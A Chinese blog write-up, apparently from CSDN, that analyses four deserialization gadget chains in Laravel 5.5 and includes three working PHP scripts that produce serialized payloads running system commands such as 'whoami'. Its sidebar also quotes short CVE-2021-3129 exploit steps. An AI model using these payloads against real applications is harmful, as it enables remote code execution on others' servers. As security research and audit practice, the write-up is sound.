laravel 5.5 RCE分析(四条链)

最新推荐文章于 2024-07-09 18:05:47 发布
最新推荐文章于 2024-07-09 18:05:47 发布
阅读量511 收藏
点赞数
分类专栏: 代码审计 文章标签: laravel
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51353029/article/details/117675192
版权

文章目录

第一条链子(和5.4一样的链子)

依然是找到_destruct函数,这里我们依然先从54漏洞的位置来分析:
在这里插入图片描述
再寻找_call函数之前,先梳理一下我们通过_call方法的思路:
首先events变量是要去实例化一个类,而且这个类中不存在dispatch方法或者可以被我们RCE,RCE这种情况概率不大基本可以忽略,其次dispatch应该是一个可控的数组,我们通过这个可控的数组传入system命令,然后event就是我们的cmd
思路清楚了,再来开始审计把:
寻找_call方法:
在这里插入图片描述
同样还是找到了laravel54的入口点,继续进去看看行不行:
在这里插入图片描述
查看变量是否可控:
在这里插入图片描述
formatters依然可控:
这里有一点要说明一下,前面5.4的时候说的不是很清楚:
在这里插入图片描述

问题一:$arguments是数组,如何RCE?

仔细看一下手册就知道system了:
在这里插入图片描述
因此我们可以传入一个数组进来

问题二:$argument=array();

但是这里又遇到一个问题,上一篇写laravel54的时候忽略了这个问题:
$argument=array();经过处理后,到底是什么样的?
在这里插入图片描述
很显然,本身的值就是一个Array,那么这里如何执行我们的cmd呢?
这里写个代码自己测试一下就知道了

<?php
    class test
    {
        protected $abc='456';
        protected $cde='789';
        public $events='1111';
        /*public function echo1($abc)
        {
            echo $abc;
            
        }
        public function dog($cde)
        {
            echo $cde;
        }
        */
        public function __construct($bcsadsa=array()) 
        {
            echo $bcsadsa;
        }
        
    }
    $a=new test('123' );

还是自己的基础知识不够扎实啊,这个地方绕了还是挺久的了。
上述代码经过各种编写,自己又进一步了解到php里面传参,控制变量等等,总结成如下:
只要不同方法里面,需要传参的个数是一样的,就可以一直把方法控制下去,如果遇到需要传入参数个数不一样,然后这个方法的类里面又没有定义这个参数,就无法控制,既然这些都已经了解了,那么就不再继续讲解这个链了,前面一篇文章讲解过。

第二条链子:(寻找其他可用的_call方法)

这里_call方法我们从Illuminate\Validation\Validator入手:主要代码如下,已经删除无关代码,可以清楚看清楚如何调用,不用自己一步一步去切换
在这里插入图片描述阐述一下整个流程:
_call–>if语句–>callExtension–>is_callable–>call_user_func_array
调用的难点:
$rule 经过snake方法改变了传进去methoed值
调用call_user_func方法就要通过is_callable
整理一下思路:

在这里插入图片描述
$rule通过substr从第八个字符开始截取,snake存在字符串替换,大小写转换等等,那么如果让传入的value等于空,返回值也会是空,那么这里$rule的值可控,并且是空(没有具体去看如果传入字符串会被怎么变形,但是这里很显然传入空,是不会做变形的)
再来看第二个难点is_callable:

在这里插入图片描述
首先extensions是一个protected的数组,我们可控,rule的值是空,那么序号1我们可控进入然后调用callExtension,这里把extensions数组rule对应的键值赋给callback,进入最后一个is_callable的判断,那就了解一下is_callable,
在这里插入图片描述
判断$name能否作为可用的函数去调用,因为后面使用了call_usr_func_arry,以免报错,那么这里我们直接传内置函数system不就好了
综上:这个链子我们需要操作的地方就只有一个:
extensions = [’’ => $function];
其他地方实例化即可。
给出EXP:

<?php
namespace Illuminate\Broadcasting
{
    class PendingBroadcast
    {
        protected $events;
        protected $event;
        public function __construct($events,$event)
        {
            $this->events =$events;
            $this->event=$event;
        }
    }
}
namespace Illuminate\Validation
{
    class Validator
    {
       public $extensions = [''=>'system'];
    }
}
namespace{
    $b = new Illuminate\Validation\Validator();
    $a = new Illuminate\Broadcasting\PendingBroadcast($b,'dir');
    echo urlencode(serialize($a));
}

最后打出的结果:
在这里插入图片描述

第三条链子:(寻找其他可用的_call方法)

首先找到一个_call方法作为入口,这里找到的是:Illuminate\Support\Manager这个类中的,跟踪结果如下:

在这里插入图片描述

再该类中找不到getDefaultDriver()方法,注意前面是abstract声明,表名这是一个接口,我们可以从其他类里面去实例化
然后开始寻找getDefaultDriver方法:Illuminate\Notifications\ChannelManager找到一个
在这里插入图片描述
并且参数可控:
在这里插入图片描述
这样一来,通过这个函数我们就可以控制$driver参数的值:
现在参数值也可控了,但是没有可以进行命令执行的点,继续看一下creatDriver这个方法,看看能否有突破口,
跟踪一下:
在这里插入图片描述
可以看到creatDriver方法里面基本上都是if语句,那么看看能不能有所突破
发现一个可以RCE的形式:

if (isset($this->customCreators[$driver])) {
            return $this->callCustomCreator($driver);
        }

到这里 总结一下:因为driver的值可控,customCreators这个数组可控–>可以进入function callCustomCreator,而且又因为this–>app的可控,所以这样一来: return->customCreators[driver]($this->app)的所有参数我们都可以控,实现RCE
整个流程图如下:
在这里插入图片描述EXP:

<?php
namespace Illuminate\Broadcasting
{
    class PendingBroadcast
    {
        protected $events;

        function __construct($events)
        {
            $this->events = $events;
        }
    }
}


namespace Illuminate\Notifications
{
    class ChannelManager
    {
        protected $app;
        protected $defaultChannel;
        protected $customCreators;

        function __construct($function, $parameter)
        {
            $this->app = $parameter;
            $this->customCreators = ['nice' => $function];
            $this->defaultChannel = 'nice';
        }
    }
}
namespace{
    $b = new Illuminate\Notifications\ChannelManager('system','whoami');
    $a = new Illuminate\Broadcasting\PendingBroadcast($b);
    echo base64_encode(serialize($a));
}

可以看到执行成功
在这里插入图片描述

第四条链子:dispatch

这一条链子比较直接,也比较简单,我直接放流程图分析:
在这里插入图片描述寻找RCE的地方,然后逆推回来。
这里RCE的方式是,listener(event,playload);
看一下$event是否可控
在这里插入图片描述

list函数这里不影响$events的取值,我们传入的events就是我们要执行的命令(dir,记住这里的dir 后面有用);
再来看一下$listenners的值能不能可控:
在这里插入图片描述
一图了然,几个需要注意的地方,返回listeners的值是数组listenner[eventName]的值,这里可控,注意,这里的eventName的值就是我们传进来的event,即dir,就变成了listenner=[‘dir’=>‘system’],这样就可以成功取到system
POC:



<?php

namespace Illuminate\Broadcasting
{
    class PendingBroadcast
    {
        protected $events;
        protected $event;

        function __construct($events, $parameter)
        {
            $this->events = $events;
            $this->event = $parameter;
        }
    }
}
namespace Illuminate\Events
{
    class Dispatcher
    {
        protected $listeners;

        function __construct($function, $parameter)
        {
            $this->listeners = [
                $parameter => [$function]
            ];
        }
    }
}
namespace{
    $b = new Illuminate\Events\Dispatcher('system','whoami');
    $a = new Illuminate\Broadcasting\PendingBroadcast($b,'whoami');
    echo urlencode(serialize($a));
}

在这里插入图片描述执行成功

总结:

寻找链子一定要有耐心,寻找可以RCE的点,再去寻找参数是否可控。
对于很多无关的代码,可以调试看看是什么意思,也可以不调试,直接理解函数意思,初次审计代码很多方法很多传变量是否覆盖这些都存在很大问题,审计完两个框架之后就会好很多。
上面的链子是参考Firebasky师傅的文章

hahahahaha!
关注
专栏目录
Laravel Debug mode RCE(CVE-2021-3129)漏洞利用
z.mumu的博客
12-07 1481
访问Laravel 访问/_ignition/execute-solution 抓包 会出现如下页面 2. 检测 修改为POST,添加内容 并且修改 Content-Type: application/json { "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": { "variableName": "username", "viewFile":.
Yii框架反序列化RCE利用分析1
08-03
本文主要探讨了Yii2框架中的反序列化 Remote Code Execution (RCE)漏洞利用分析和构造过程。 首先,让我们理解反序列化漏洞的基本概念。在PHP中,`unserialize()`函数用于将序列化的字符串还原为PHP的对象或...
laravel-8.4.2-rce
05-28
laravel-8.4.2-rce 设置环境 git clone https://github.com/laravel/laravel.git cd laravel git checkout e849812 composer install composer require facade/ignition==2.5.1 php artisan serve 用法 python3 exploit.py http://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log ' uname -a ' 参考
laravel 58 RCE分析(一条子)
E1even的博客
06-10 378
文章目录写在最前面和laravel55 一样的EXP寻找一个新的子->dispatch:漏洞分析:继续分析:最终EXP:总结: 写在最前面 之前审计过laravel54 55的框架,这次继续跟着WP审计一下laravel58,这次子相比于前面两个框架,相比来说更为复杂一点,因此再审计的过程,建议读者不断回溯代码,理解每个参数变量的来源,环境搭建这里不做讲解了,直接进行分析laravel55 一样的EXP 首先依然是寻找_construct方法:这里找的是 :Illuminate\Broadca
命令执行(RCE)面对各种过滤,骚姿势绕过总结
最新发布
HUANGXIN9898的博客
07-09 1381
RCE又称远程代码执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
laravel 5.4 RCE分析(2条
E1even的博客
06-07 249
在此之前看过其他师傅的审计文章,看完之后想自己审计出几条子 找到destruct函数: 跟进一下这几个参数: 首先是events: 发现events是可控的 event同样可控,再跟进一下dispatch函数 很多地方都定义了function dispatch 函数 再来看一下我们的入口点__destruct()函数:有两个思路:第一个是调用_call方法,看看能不能调用方法进行命令执行。第二个方法是再dispatch函数里面去寻找可以命令执行的函数 public function __dest
Laravel RCE(CVE-2021-3129)复现
m0_64815693的博客
01-27 2428
CVE-2021-3129漏洞复现 Laravel Debug mode RCE
CVE-2021-3129:Laravel调试RCE
05-26
Laravel debug rce 食用方法 执行docker-compse up -d启动环境 访问8888端口后点击首页面的generate key就可以复现了 关于docker环境想说的几点: 把.env.example复制到.env作用是开启debug环境 关闭了php.ini的phar...
代码审计_PHPCMS_V9前台RCE挖掘分析1
08-03
代码审计_PHPCMS_V9前台RCE挖掘分析1
Laravel Debug mode RCE(CVE-2021-3129)漏洞复现
feng的博客
05-31 1694
Laravel Debug mode RCE(CVE-2021-3129)漏洞复现 前言 这个之前在VNCTF2021的时候遇到过,当时自己只是拿着脚本直接打,并没有对于原理好好了解一下。最近国赛,还有i春秋都出现了以yii和thinkphp为背景的关于日志写phar来实现phar反序列化的这种题目,所以就来好好地复现和学习一下这个RCE。中间也是踩了很多坑,在@Jiang师傅的帮助下复现成功,也是加深了理解。 参考接 一定一定一定把这篇文章中讲到的都仔细地领悟一下,踩的很多坑都是因为看这篇文章的时候比较
Laravel反序列化实现RCE
p4nic的博客
08-28 680
Laravel反序列化实现RCE,版本5.1和7.30
CVE-2019-9081:laravel框架序列化RCE复现分析
bamanju0574的博客
09-10 657
这里贴上两篇大佬的分析的帖子 本人习惯把平常的一些笔记或者好的帖子记录在自己的博客当中,便于之后遇到同样的漏洞时快速打开思路 1.https://xz.aliyun.com/t/5510#toc-8 2.https://skysec.top/2019/07/22/CVE-2019-9081-Laravel-Deserialization-RCE-Vulnerability/#%E6...
RCE
鲨鱼辣椒的博客
05-20 439
什么是RCE RCE(remote command/code execute) 可以直接让攻击者向后台服务器远程注入操作系统命令或者代码,从而控制后台系统 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如一些防火墙、路由器等设备的web管理界面 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而,如果,设计者在完成该功能时,没有做严格的安全控制,则可能
再谈Laravel Debug mode RCE(CVE-2021-3129)漏洞
wangluoanquan111的博客
08-10 3180
Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。2021年01月12日,Laravel被披露存在一个远程代码执行漏洞(CVE-2021-3129)。当Laravel开启了Debug模式时,由于Laravel自带的Ignition组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。
rce
weixin_44110913的博客
04-14 420
pikachu靶场 :五、RCE 概述远程系统命令...
php laravel框架 rce分析 cve-2018-15133
whatday的专栏
08-30 1895
本文将记录在APP_KEY泄露情况下的Laravel RCE漏洞。该漏洞可以分别在两个地方触发,一个是直接添加在cookie字段,例如:Cookie: ATTACK=payload;另一处是在HTTP Header处添加X-XSRF-TOKEN字段,例如:X-XSRF-TOKEN: payload。漏洞影响版本:5.5.x<=5.5.40、5.6.x<=5.6.29。 环境搭建 这里我的测试环境为Debian9+apache+PHP7.2+Laravel5.6....
LightCMS后台Phar反序列化RCE分析
"LightCMS全版本后台存在 Remote Code Execution (RCE) 0day漏洞,该漏洞通过Phar反序列化技术利用Laravel框架的弱点。攻击者可以通过图像上传功能上传phar文件,并通过特定的控制器方法触发RCE分析过程中涉及到的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值